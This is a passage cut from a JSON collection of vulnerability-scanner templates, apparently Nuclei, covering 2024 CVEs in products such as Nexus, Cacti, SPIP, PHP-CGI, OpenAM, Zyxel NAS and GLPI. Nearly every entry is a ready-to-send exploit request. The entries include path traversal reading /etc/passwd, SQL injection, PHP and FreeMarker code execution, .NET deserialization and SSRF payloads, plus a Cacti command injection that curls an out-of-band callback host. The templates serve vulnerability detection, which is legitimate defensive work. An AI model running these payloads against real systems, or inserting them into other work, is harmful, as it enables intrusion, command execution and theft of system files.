application/x-www-form-urlencoded\n\nlogin={{username}}&pass={{password}}&submit=submit\n","GET /index.php?page=calendar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view=activity","?page=calendar","<img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2024-4956","info":{"name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(header, \"application/octet-stream\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-40348","info":{"name":"Bazarr < 1.4.3 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login"],"matchers":[{"type":"word","part":"body","words":["<title>Bazarr</title>","content=\"Bazarr","window.Bazarr"],"condition":"or","internal":true}]},{"method":"GET","path":["{{BaseURL}}/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-39250","info":{"name":"EfroTech Timetrax v8.3 - Sql Injection","severity":"high"},"requests":[{"raw":["GET /Login.aspx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"TimeTrax - Cloud HR Software\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /search.aspx?q=' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Incorrect syntax near\",\"Unclosed quotation mark after the character string\")","contains(content_type, \"text/html\")","status_code == 500"],"condition":"and"}]}]},{"id":"CVE-2024-38473","info":{"name":"Apache HTTP Server - ACL Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{files}}"],"payloads":{"files":["admin.php","adminer.php","xmlrpc.php",".env","admin.php","php-info.php","php_info.php","phpinfo.php","info.php","adminer.php","xmlrpc.php","bin/cron.php","cache/index.tpl.php","cpanel.php"]},"stop-at-first-match":true,"matchers":[{"type":"status","status":[403,401],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/{{http_1_files}}%3ftest.php"],"matchers":[{"type":"status","status":[200]}]},{"method":"GET","path":["{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"],"matchers":[{"type":"word","words":["On Debian systems, the complete text of the GNU General Public License","This package was written by Peter Tobias"],"condition":"and"}]}]},{"id":"CVE-2024-31750","info":{"name":"F-logic DataCube3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nreq_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq\")","contains(header, \"application/json\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-7954","info":{"name":"SPIP Porte Plume Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?action=porte_plume_previsu HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndata=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["Composed-By: SPIP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29895","info":{"name":"Cacti cmd_realtime.php - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31848","info":{"name":"CData API Server < 23.4.8844 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - API Server</title>"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29059","info":{"name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","severity":"high"},"requests":[{"raw":["GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1\nHost: {{Hostname}}\n__RequestVerb: POST\nContent-Type: text/xml\n","POST {{objref}} HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml\n\n<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<a1:TextFormattingRunProperties id=\"ref-1\" xmlns:a1=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35\">\n<ForegroundBrush id=\"ref-3\">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;\n  xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;\n  xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;\n  xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;\n  xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;/ObjectDataProvider&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider.MethodParameters&#62;\n  &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;\n  &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;\n  &#60;/ObjectDataProvider.MethodParameters&#62;\n&#60;/ObjectDataProvider&#62;</ForegroundBrush>\n</a1:TextFormattingRunProperties>\n</SOAP-ENV:Envelope>\n"],"extractors":[{"type":"regex","name":"objref","part":"body_1","group":1,"regex":["(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"],"internal":true},{"type":"dsl","dsl":["x_vuln_test"]}],"matchers":[{"type":"dsl","dsl":["contains(body_1,'ObjRef')","contains(x_vuln_test,'{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2024-6587","info":{"name":"LiteLLM - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /chat/completions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"model\": \"command-nightly\",\n  \"messages\": [\n    {\n      \"content\": \"Hello, how are you?\",\n      \"role\": \"user\"\n    }\n  ],\n  \"api_base\": \"https://{{interactsh-url}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["Bearer"]}]}]},{"id":"CVE-2024-41107","info":{"name":"Apache CloudStack - SAML Signature Exclusion","severity":"critical"},"requests":[{"raw":["POST /client/api?command=samlSso HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nRelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header,'sessionkey')","contains(content_type,'text/xml')","status_code==302"],"condition":"and"}]}]},{"id":"CVE-2024-21645","info":{"name":"pyload - Log Injection","severity":"medium"},"requests":[{"raw":["POST /login?next={{RootURL}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{randstr}}\\'%0a[1970-01-01 00:00:00]  INJECTED               {{str}}  THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login\n","POST /login?next={{RootURL}}/logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{username}}&password={{password}}&submit=Login\n"],"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td>1970-01-01 00:00:00</td><td class=\"loglevel\">INJECTED</td><td class=\"logsource\">{{str}}</td><td>THIS&nbsp;ENTRY&nbsp;HAS&nbsp;BEEN&nbsp;INJECTED&#39;</td>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4577","info":{"name":"PHP CGI - Argument Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input","{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"],"body":"<?php echo md5(\"CVE-2024-4577\"); ?>\n","stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["3f2ba4ab3b260f4c2dc61a6fac7c3e8a"]}]}]},{"id":"CVE-2024-31850","info":{"name":"CData Arc < 23.4.8839 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData Arc"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24565","info":{"name":"CrateDB Database - Arbitrary File Read","severity":"medium"},"requests":[{"raw":["POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"CREATE TABLE {{table_name}}(info_leak STRING)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"COPY {{table_name}} FROM '/etc/passwd' with (format='csv', header=false)\"}\n","POST /_sql?types HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\"stmt\":\"SELECT * FROM {{table_name}} limit 100\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_3)","contains_all(header, 'application/json')","status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-41667","info":{"name":"OpenAM<=15.0.3 FreeMarker - Template Injection","severity":"high"},"requests":[{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n"],"matchers":[{"type":"word","part":"body","words":["authId"],"internal":true}],"extractors":[{"type":"regex","name":"authId","part":"body","group":1,"regex":["\"authId\":\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/json/realms/root/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-API-Version: protocol=1.0,resource=2.1\nX-Password: anonymous\nX-Username: anonymous\nContent-Type: application/json\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nX-NoSession: true\n\n{\"authId\":\"{{authId}}\",\"template\":\"\",\"stage\":\"DataStore1\",\"header\":\"Sign in to OpenAM\",\"infoText\":[\"\",\"\"],\"callbacks\":[{\"type\":\"NameCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"User Name:\"}],\"input\":[{\"name\":\"IDToken1\",\"value\":\"{{username}}\"}]},{\"type\":\"PasswordCallback\",\"output\":[{\"name\":\"prompt\",\"value\":\"Password:\"}],\"input\":[{\"name\":\"IDToken2\",\"value\":\"{{password}}\"}]}]}\n"],"matchers":[{"type":"word","part":"body","words":["tokenId"]}],"extractors":[{"type":"kval","name":"csrf","part":"header","internal":true,"kval":["iPlanetDirectoryPro"]}]},{"raw":["GET /openam/realm/RMRealm?RMRealm.tblDataActionHref=/&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession1","part":"body","group":1,"regex":["jato.pageSession=(.*?)\""]}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tabCommon.TabHref=186&jato.pageSession={{pageSession1}}&requester=XUI HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession2","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\njato.defaultCommand=%2Fg&jato.pageSession={{pageSession2}}\n"],"extractors":[{"type":"regex","name":"pageSession3","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/Agents HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\n&Agents.tfFilter=*&Agents.tblSearch.PrimarySortNameHiddenField=tblDataName&Agents.tblSearch.PrimarySortOrderHiddenField=ascending&Agents.tblSearch.SecondarySortNameHiddenField=&Agents.tblSearch.SecondarySortOrderHiddenField=&Agents.tblSearch.AdvancedSortNameHiddenField=&Agents.tblSearch.AdvancedSortOrderHiddenField=&Agents.tblButtonAdd=New...&Agents.tblButtonDelete.DisabledHiddenField=true&Agents.tblSearch.SelectionCheckbox0.jato_boolean=false&Agents.tblDataUniversalName=id%3Dou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&Agents.tfGroupFilter=*&Agents.tblSearchGroup.PrimarySortNameHiddenField=tblDataGroupName&Agents.tblSearchGroup.PrimarySortOrderHiddenField=ascending&Agents.tblSearchGroup.SecondarySortNameHiddenField=&Agents.tblSearchGroup.SecondarySortOrderHiddenField=&Agents.tblSearchGroup.AdvancedSortNameHiddenField=&Agents.tblSearchGroup.AdvancedSortOrderHiddenField=&Agents.tblButtonGroupDelete.DisabledHiddenField=true&jato.defaultCommand=%2FbtnSearch&jato.pageSession={{pageSession3}}\n"],"extractors":[{"type":"regex","name":"pageSession4","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/AgentAdd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nAgentAdd.button1=Create&AgentAdd.tfName={{randstr}}&AgentAdd.tfPassword=test&AgentAdd.tfPasswordConfirm=test&jato.defaultCommand=%2Fbutton1&jato.pageSession={{pageSession4}}\n"],"extractors":[{"type":"regex","name":"pageSession5","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["GET /openam/agentconfig/Agents?Agents.tblDataActionHref=id%3D{{randstr}}%2Cou%3Dagentonly%2Cdc%3Dopenam%2Cdc%3Dopenidentityplatform%2Cdc%3Dorg&jato.pageSession={{pageSession2}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"pageSession6","part":"body","group":1,"regex":["\"jato.pageSession\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /openam/agentconfig/GenericAgentProfile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nGenericAgentProfile.button1=+Save+&GenericAgentProfile.agentgroup=&GenericAgentProfile.sunIdentityServerDeviceStatus=Active&GenericAgentProfile.userpassword=&GenericAgentProfile.userpassword_confirm=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientType=Confidential&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.listbox=https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.redirectionURIs.selectedTextField=https%3A%2F%2Fgithub.com%09https%3A%2F%2Fgithub.com&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.listbox=employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=employeenumber%09employeenumber&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.scopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.claims.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.name.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.description.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultScopes.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.responseTypes.selectedTextField=code%09code%09token%09token%09id_token%09id_token%09code+token%09code+token%09token+id_token%09token+id_token%09code+id_token%09code+id_token%09code+token+id_token%09code+token+id_token&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.contacts.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.tokenEndPointAuthMethod=client_secret_basic&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwksURI=http%3A%2F%2Fkubernetes.docker.internal%3A8081%2Fopenam%2Foauth2%2Fconnect%2Fjwk_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwks=&GenericAgentProfile.com.forgerock.openam.oauth2provider.sectorIdentifierURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.subjectType=Public&GenericAgentProfile.com.forgerock.openam.oauth2provider.idTokenSignedResponseAlg=HS256&GenericAgentProfile.idTokenEncryptionEnabled.jato_boolean=false&GenericAgentProfile.idTokenEncryptionAlgorithm=RSA1_5&GenericAgentProfile.idTokenEncryptionMethod=A128CBC-HS256&GenericAgentProfile.idTokenPublicEncryptionKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.postLogoutRedirectURI.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessToken=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientSessionURI=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.deleteButton.DisabledHiddenField=true&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.textField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.addButton.DisabledHiddenField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientName.selectedTextField=&GenericAgentProfile.com.forgerock.openam.oauth2provider.clientJwtPublicKey=&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAge=600&GenericAgentProfile.com.forgerock.openam.oauth2provider.defaultMaxAgeEnabled.jato_boolean=false&GenericAgentProfile.com.forgerock.openam.oauth2provider.publicKeyLocation=jwks_uri&GenericAgentProfile.com.forgerock.openam.oauth2provider.authorizationCodeLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.refreshTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.accessTokenLifeTime=0&GenericAgentProfile.com.forgerock.openam.oauth2provider.jwtTokenLifeTime=0&GenericAgentProfile.isConsentImplied.jato_boolean=false&jato.pageSession={{pageSession6}}\n"],"matchers":[{"type":"word","part":"body","words":["<div class=\"AlrtMsgTxt\">Profile was updated.</div>"]}]},{"raw":["POST /openam/json/realms/root/realm-config/services/oauth-oidc?_action=create HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\nConnection: keep-alive\n\n{}\n"],"matchers":[{"type":"word","part":"body","words":["message","reason","code"],"condition":"and"}]},{"raw":["PUT /openam/json/realms/root/realm-config/services/oauth-oidc HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/json\n\n{\"advancedOAuth2Config\":{\"customLoginUrlTemplate\":\"<#assign value=\\\"freemarker.template.utility.Execute\\\"?new()>${value(\\\"head -n 1 /etc/passwd\\\")}\"},\"deviceCodeConfig\":{\"completionUrl\":\"\",\"verificationUrl\":\"\",\"devicePollInterval\":5,\"deviceCodeLifetime\":300},\"oidcSsoProviderEnabled\":false,\"_id\":\"\",\"_type\":{\"_id\":\"oauth-oidc\",\"name\":\"OAuth2 Provider\",\"collection\":false}}\n"],"matchers":[{"type":"word","part":"body","words":["advancedOAuth2Config","customLoginUrlTemplate"],"condition":"and"}]},{"raw":["GET /openam/oauth2/realms/root/authorize?client_id={{randstr}}&scope=employeenumber&redirect_uri=https://github.com&response_type=code&csrf={{csrf}}&max_age=200 HTTP/1.1\nHost: {{Hostname}}\n"],"disable-cookie":true,"matchers":[{"type":"dsl","dsl":["contains(urldecode(location),\"root:x:0:0:\")"]}]}]},{"id":"CVE-2024-29973","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /cmd,/simZysh/register_main/setCookie HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"c0\"\n\nstorage_ext_cgi CGIGetExtStoInfo None) and False or __import__(\"subprocess\").check_output(\"echo {{string}}\", shell=True)#\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'errmsg0\": \"OK')","contains(header, 'application/json')","contains(body, '{{string}}')"],"condition":"and"}]}]},{"id":"CVE-2024-1212","info":{"name":"Progress Kemp LoadMaster - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/access/set?param=enableapi&value=1"],"headers":{"Authorization":"Basic JztsczsnOmRvZXNub3RtYXR0ZXI="},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bin","mnt","WWW-Authenticate: Basic"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29889","info":{"name":"GLPI 10.0.10-10.0.14 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /index.php?noAUTO=1 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"fieldlogin","part":"body","group":1,"regex":["id=\"login_name\" name=\"([a-z0-9]+)"],"internal":true},{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)"],"internal":true},{"type":"regex","name":"fieldpassword","part":"body","group":1,"regex":["id=\"login_password\" name=\"([0-9a-z]+)"],"internal":true}]},{"raw":["POST /front/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnoAUTO=1&redirect=&_glpi_csrf_token={{csrf}}&{{fieldlogin}}={{username}}&{{fieldpassword}}={{password}}&auth=local&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(location,'front/central.php')"],"condition":"and","internal":true}]},{"raw":["GET /ajax/common.tabs.php?_glpi_tab=User%241&main_class=tab_cadre_fixe&_target=%2Fglpi%2Ffront%2Fpreference.php&_itemtype=Preference&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"id","part":"body","group":1,"regex":["type='hidden' name='id' value='([0-9]+)'"],"internal":true}]},{"raw":["GET /front/preference.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf2","part":"body","group":1,"regex":["type=\"hidden\" name=\"_glpi_csrf_token\" value=\"(.*?)\""],"internal":true}]},{"raw":["POST /front/preference.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryRNyVHuSeiTMi2G7K\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"savedsearches_pinned\"\n\n{\"exploit\":\"',api_token='{{randstr}}' where id={{id}};-- -\"}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_glpi_csrf_token\"\n\n{{csrf2}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"name\"\n\nglpi\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"id\"\n\n{{id}}\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"realname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_uploader_picture[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_blank_picture\"\n\n0\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"firstname\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"language\"\n\nen_US\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"password2\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"phone\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; name=\"_useremails[-1]\"\n\n\n------WebKitFormBoundaryRNyVHuSeiTMi2G7K\nContent-Disposition: form-data; 